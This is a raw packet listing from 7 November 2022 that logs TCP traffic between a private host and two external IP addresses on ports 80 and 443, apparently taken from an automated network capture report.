Nov 7, 2022 23:48:49.106190920 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.106223106 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.106235981 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.106249094 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.106260061 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.106301069 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.106314898 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.106327057 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.106340885 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.106368065 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.106415987 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.106429100 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.106441975 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.106507063 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.106519938 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.106573105 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.106611013 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.106657028 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.106671095 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.106684923 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.106697083 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.106731892 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.106771946 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.106863022 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.106893063 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.106911898 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.106930971 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.106946945 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.106959105 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.109611034 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.109631062 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.109646082 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.109659910 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.109673977 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.109688997 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.109756947 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.109771967 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.109786034 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.109800100 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.109813929 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.109827995 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.109873056 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.109888077 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.109901905 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.109915972 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.109978914 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.109996080 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.110011101 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.110024929 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.110038996 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.110053062 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.110066891 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.110080957 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.110094070 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.110107899 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.110110044 CET	49711	80	192.168.2.7	79.137.204.112
Nov 7, 2022 23:48:49.110121965 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.110135078 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.110148907 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.110188961 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.110204935 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.110219955 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.110234976 CET	49711	80	192.168.2.7	79.137.204.112
Nov 7, 2022 23:48:49.110238075 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.110253096 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.110268116 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.110349894 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.110363007 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.110377073 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.110419035 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.110527992 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.110542059 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.110555887 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.110570908 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.110584021 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.110598087 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.110611916 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.110625982 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.110641003 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.110656977 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.111116886 CET	49711	80	192.168.2.7	79.137.204.112
Nov 7, 2022 23:48:49.111236095 CET	49711	80	192.168.2.7	79.137.204.112
Nov 7, 2022 23:48:49.140455008 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.140491009 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.140506029 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.140522003 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.140789986 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.140857935 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.140873909 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.140889883 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.140904903 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.140918970 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.140933990 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.140949011 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.140963078 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.140976906 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.140991926 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.141006947 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.141570091 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.142450094 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.142479897 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.142498970 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.142518044 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.142538071 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.142555952 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.142568111 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.142581940 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.142589092 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.142596960 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.142604113 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.142612934 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.142623901 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.142640114 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.142656088 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.143660069 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.143690109 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.143708944 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.143727064 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.143745899 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.143764973 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.143783092 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.143801928 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.144094944 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.144179106 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.144187927 CET	49711	80	192.168.2.7	79.137.204.112
Nov 7, 2022 23:48:49.144366980 CET	49711	80	192.168.2.7	79.137.204.112
Nov 7, 2022 23:48:49.144474983 CET	49711	80	192.168.2.7	79.137.204.112
Nov 7, 2022 23:48:49.173865080 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.173919916 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.173953056 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.173983097 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.174015999 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.174046040 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.174077034 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.174108028 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.174138069 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.174181938 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.174206018 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.174228907 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.174253941 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.174276114 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.174299002 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.174321890 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.174345970 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.174370050 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.174393892 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.174432993 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.174474001 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.174567938 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.174593925 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.174618006 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.174644947 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.682095051 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.688536882 CET	49711	80	192.168.2.7	79.137.204.112
Nov 7, 2022 23:48:49.718014002 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:49.910602093 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:48:50.119469881 CET	49711	80	192.168.2.7	79.137.204.112
Nov 7, 2022 23:48:50.156995058 CET	49713	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:48:50.157040119 CET	443	49713	35.213.155.151	192.168.2.7
Nov 7, 2022 23:48:50.157139063 CET	49713	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:48:50.159091949 CET	49713	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:48:50.159123898 CET	443	49713	35.213.155.151	192.168.2.7
Nov 7, 2022 23:48:50.983618021 CET	443	49713	35.213.155.151	192.168.2.7
Nov 7, 2022 23:48:50.983839989 CET	49713	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:48:50.998176098 CET	49713	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:48:50.998214006 CET	443	49713	35.213.155.151	192.168.2.7
Nov 7, 2022 23:48:50.998616934 CET	443	49713	35.213.155.151	192.168.2.7
Nov 7, 2022 23:48:51.001287937 CET	49713	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:48:51.001317978 CET	443	49713	35.213.155.151	192.168.2.7
Nov 7, 2022 23:48:51.784153938 CET	443	49713	35.213.155.151	192.168.2.7
Nov 7, 2022 23:48:51.784293890 CET	443	49713	35.213.155.151	192.168.2.7
Nov 7, 2022 23:48:51.784462929 CET	49713	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:48:51.784507990 CET	443	49713	35.213.155.151	192.168.2.7
Nov 7, 2022 23:48:51.784575939 CET	443	49713	35.213.155.151	192.168.2.7
Nov 7, 2022 23:48:51.784687042 CET	49713	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:48:51.784704924 CET	443	49713	35.213.155.151	192.168.2.7
Nov 7, 2022 23:48:51.784811020 CET	443	49713	35.213.155.151	192.168.2.7
Nov 7, 2022 23:48:51.784849882 CET	443	49713	35.213.155.151	192.168.2.7
Nov 7, 2022 23:48:51.784926891 CET	49713	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:48:51.784926891 CET	49713	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:48:51.784960985 CET	443	49713	35.213.155.151	192.168.2.7
Nov 7, 2022 23:48:51.850653887 CET	49713	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:48:52.053349972 CET	443	49713	35.213.155.151	192.168.2.7
Nov 7, 2022 23:48:52.053380013 CET	443	49713	35.213.155.151	192.168.2.7
Nov 7, 2022 23:48:52.053508997 CET	49713	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:48:52.053525925 CET	443	49713	35.213.155.151	192.168.2.7
Nov 7, 2022 23:48:52.053564072 CET	49713	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:48:52.053641081 CET	443	49713	35.213.155.151	192.168.2.7
Nov 7, 2022 23:48:52.053663015 CET	443	49713	35.213.155.151	192.168.2.7
Nov 7, 2022 23:48:52.053766012 CET	49713	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:48:52.053776026 CET	443	49713	35.213.155.151	192.168.2.7
Nov 7, 2022 23:48:52.053807020 CET	49713	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:48:52.053855896 CET	443	49713	35.213.155.151	192.168.2.7
Nov 7, 2022 23:48:52.053874969 CET	443	49713	35.213.155.151	192.168.2.7
Nov 7, 2022 23:48:52.053917885 CET	49713	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:48:52.053925991 CET	443	49713	35.213.155.151	192.168.2.7
Nov 7, 2022 23:48:52.053947926 CET	49713	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:48:52.053965092 CET	49713	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:48:52.322839975 CET	443	49713	35.213.155.151	192.168.2.7
Nov 7, 2022 23:48:52.322870016 CET	443	49713	35.213.155.151	192.168.2.7
Nov 7, 2022 23:48:52.322976112 CET	49713	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:48:52.322990894 CET	443	49713	35.213.155.151	192.168.2.7
Nov 7, 2022 23:48:52.323014021 CET	49713	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:48:52.323031902 CET	49713	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:48:52.323292017 CET	443	49713	35.213.155.151	192.168.2.7
Nov 7, 2022 23:48:52.323313951 CET	443	49713	35.213.155.151	192.168.2.7
Nov 7, 2022 23:48:52.323379993 CET	49713	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:48:52.323389053 CET	443	49713	35.213.155.151	192.168.2.7
Nov 7, 2022 23:48:52.323425055 CET	49713	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:48:52.323443890 CET	49713	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:48:52.323816061 CET	443	49713	35.213.155.151	192.168.2.7
Nov 7, 2022 23:48:52.323837996 CET	443	49713	35.213.155.151	192.168.2.7
Nov 7, 2022 23:48:52.323910952 CET	49713	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:48:52.323929071 CET	443	49713	35.213.155.151	192.168.2.7
Nov 7, 2022 23:48:52.323949099 CET	49713	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:48:52.323982000 CET	49713	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:48:52.324287891 CET	443	49713	35.213.155.151	192.168.2.7
Nov 7, 2022 23:48:52.324309111 CET	443	49713	35.213.155.151	192.168.2.7
Nov 7, 2022 23:48:52.324383020 CET	49713	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:48:52.324393034 CET	443	49713	35.213.155.151	192.168.2.7
Nov 7, 2022 23:48:52.324414015 CET	49713	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:48:52.324434042 CET	49713	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:48:52.324781895 CET	443	49713	35.213.155.151	192.168.2.7
Nov 7, 2022 23:48:52.324805021 CET	443	49713	35.213.155.151	192.168.2.7
Nov 7, 2022 23:48:52.324871063 CET	49713	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:48:52.324881077 CET	443	49713	35.213.155.151	192.168.2.7
Nov 7, 2022 23:48:52.324927092 CET	49713	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:48:52.324927092 CET	49713	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:48:52.361588955 CET	443	49713	35.213.155.151	192.168.2.7
Nov 7, 2022 23:48:52.361618996 CET	443	49713	35.213.155.151	192.168.2.7
Nov 7, 2022 23:48:52.361762047 CET	49713	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:48:52.361778021 CET	443	49713	35.213.155.151	192.168.2.7
Nov 7, 2022 23:48:52.361825943 CET	49713	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:48:52.593662024 CET	443	49713	35.213.155.151	192.168.2.7
Nov 7, 2022 23:48:52.593683958 CET	443	49713	35.213.155.151	192.168.2.7
Nov 7, 2022 23:48:52.593736887 CET	443	49713	35.213.155.151	192.168.2.7
Nov 7, 2022 23:48:52.593801975 CET	49713	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:48:52.593820095 CET	443	49713	35.213.155.151	192.168.2.7
Nov 7, 2022 23:48:52.593846083 CET	49713	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:48:52.593863010 CET	49713	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:48:52.594101906 CET	443	49713	35.213.155.151	192.168.2.7
Nov 7, 2022 23:48:52.594126940 CET	443	49713	35.213.155.151	192.168.2.7
Nov 7, 2022 23:48:52.594177961 CET	49713	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:48:52.594187975 CET	443	49713	35.213.155.151	192.168.2.7
Nov 7, 2022 23:48:52.594218969 CET	49713	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:48:52.594230890 CET	49713	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:48:52.594410896 CET	443	49713	35.213.155.151	192.168.2.7
Nov 7, 2022 23:48:52.594429970 CET	443	49713	35.213.155.151	192.168.2.7
Nov 7, 2022 23:48:52.594474077 CET	49713	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:48:52.594484091 CET	443	49713	35.213.155.151	192.168.2.7
Nov 7, 2022 23:48:52.594504118 CET	49713	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:48:52.594521046 CET	49713	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:48:52.594754934 CET	443	49713	35.213.155.151	192.168.2.7
Nov 7, 2022 23:48:52.594774008 CET	443	49713	35.213.155.151	192.168.2.7
Nov 7, 2022 23:48:52.594820976 CET	49713	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:48:52.594830036 CET	443	49713	35.213.155.151	192.168.2.7
Nov 7, 2022 23:48:52.594851017 CET	49713	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:48:52.594863892 CET	49713	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:48:52.595097065 CET	443	49713	35.213.155.151	192.168.2.7
Nov 7, 2022 23:48:52.595118999 CET	443	49713	35.213.155.151	192.168.2.7
Nov 7, 2022 23:48:52.595168114 CET	49713	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:48:52.595175982 CET	443	49713	35.213.155.151	192.168.2.7
Nov 7, 2022 23:48:52.595200062 CET	49713	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:48:52.595213890 CET	49713	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:48:52.595431089 CET	443	49713	35.213.155.151	192.168.2.7
Nov 7, 2022 23:48:52.595453024 CET	443	49713	35.213.155.151	192.168.2.7
Nov 7, 2022 23:48:52.595494986 CET	49713	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:48:52.595504999 CET	443	49713	35.213.155.151	192.168.2.7
Nov 7, 2022 23:48:52.595534086 CET	49713	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:48:52.595550060 CET	49713	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:48:52.595782042 CET	443	49713	35.213.155.151	192.168.2.7
Nov 7, 2022 23:48:52.595801115 CET	443	49713	35.213.155.151	192.168.2.7
Nov 7, 2022 23:48:52.595844030 CET	49713	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:48:52.595851898 CET	443	49713	35.213.155.151	192.168.2.7
Nov 7, 2022 23:48:52.595869064 CET	49713	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:48:52.595884085 CET	49713	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:48:52.596105099 CET	443	49713	35.213.155.151	192.168.2.7
Nov 7, 2022 23:48:52.596127033 CET	443	49713	35.213.155.151	192.168.2.7
Nov 7, 2022 23:48:52.596175909 CET	49713	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:48:52.596184969 CET	443	49713	35.213.155.151	192.168.2.7
Nov 7, 2022 23:48:52.596210003 CET	49713	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:48:52.596230030 CET	49713	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:48:52.596457005 CET	443	49713	35.213.155.151	192.168.2.7
Nov 7, 2022 23:48:52.596477032 CET	443	49713	35.213.155.151	192.168.2.7
Nov 7, 2022 23:48:52.596529007 CET	49713	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:48:52.596538067 CET	443	49713	35.213.155.151	192.168.2.7
Nov 7, 2022 23:48:52.596551895 CET	49713	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:48:52.596577883 CET	49713	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:48:52.596776962 CET	443	49713	35.213.155.151	192.168.2.7
Nov 7, 2022 23:48:52.596796989 CET	443	49713	35.213.155.151	192.168.2.7
Nov 7, 2022 23:48:52.596843004 CET	49713	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:48:52.596851110 CET	443	49713	35.213.155.151	192.168.2.7
Nov 7, 2022 23:48:52.596868038 CET	49713	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:48:52.596887112 CET	49713	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:48:52.597110987 CET	443	49713	35.213.155.151	192.168.2.7
Nov 7, 2022 23:48:52.597131014 CET	443	49713	35.213.155.151	192.168.2.7
Nov 7, 2022 23:48:52.597172976 CET	49713	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:48:52.597181082 CET	443	49713	35.213.155.151	192.168.2.7
Nov 7, 2022 23:48:52.597217083 CET	49713	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:48:52.597232103 CET	49713	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:48:52.630866051 CET	443	49713	35.213.155.151	192.168.2.7
Nov 7, 2022 23:48:52.630958080 CET	443	49713	35.213.155.151	192.168.2.7
Nov 7, 2022 23:48:52.631103992 CET	49713	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:48:52.631125927 CET	443	49713	35.213.155.151	192.168.2.7
Nov 7, 2022 23:48:52.631140947 CET	443	49713	35.213.155.151	192.168.2.7
Nov 7, 2022 23:48:52.631150007 CET	49713	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:48:52.631176949 CET	49713	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:48:52.631189108 CET	443	49713	35.213.155.151	192.168.2.7
Nov 7, 2022 23:48:52.631212950 CET	49713	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:48:52.631221056 CET	443	49713	35.213.155.151	192.168.2.7
Nov 7, 2022 23:48:52.631242990 CET	49713	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:48:52.631259918 CET	49713	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:48:52.867244959 CET	443	49713	35.213.155.151	192.168.2.7
Nov 7, 2022 23:48:52.867306948 CET	443	49713	35.213.155.151	192.168.2.7
Nov 7, 2022 23:48:52.867495060 CET	49713	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:48:52.867523909 CET	443	49713	35.213.155.151	192.168.2.7
Nov 7, 2022 23:48:52.867582083 CET	49713	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:48:52.868158102 CET	443	49713	35.213.155.151	192.168.2.7
Nov 7, 2022 23:48:52.868202925 CET	443	49713	35.213.155.151	192.168.2.7
Nov 7, 2022 23:48:52.868258953 CET	49713	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:48:52.868274927 CET	443	49713	35.213.155.151	192.168.2.7
Nov 7, 2022 23:48:52.868329048 CET	49713	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:48:52.869195938 CET	443	49713	35.213.155.151	192.168.2.7
Nov 7, 2022 23:48:52.869240999 CET	443	49713	35.213.155.151	192.168.2.7
Nov 7, 2022 23:48:52.869334936 CET	49713	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:48:52.869357109 CET	443	49713	35.213.155.151	192.168.2.7
Nov 7, 2022 23:48:52.869384050 CET	49713	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:48:52.869402885 CET	49713	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:48:52.870455980 CET	443	49713	35.213.155.151	192.168.2.7
Nov 7, 2022 23:48:52.870490074 CET	443	49713	35.213.155.151	192.168.2.7
Nov 7, 2022 23:48:52.870672941 CET	49713	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:48:52.870688915 CET	443	49713	35.213.155.151	192.168.2.7
Nov 7, 2022 23:48:52.870732069 CET	49713	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:48:52.871695995 CET	443	49713	35.213.155.151	192.168.2.7
Nov 7, 2022 23:48:52.871754885 CET	443	49713	35.213.155.151	192.168.2.7
Nov 7, 2022 23:48:52.871805906 CET	49713	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:48:52.871826887 CET	443	49713	35.213.155.151	192.168.2.7
Nov 7, 2022 23:48:52.871871948 CET	49713	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:48:52.871911049 CET	49713	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:48:52.872723103 CET	443	49713	35.213.155.151	192.168.2.7
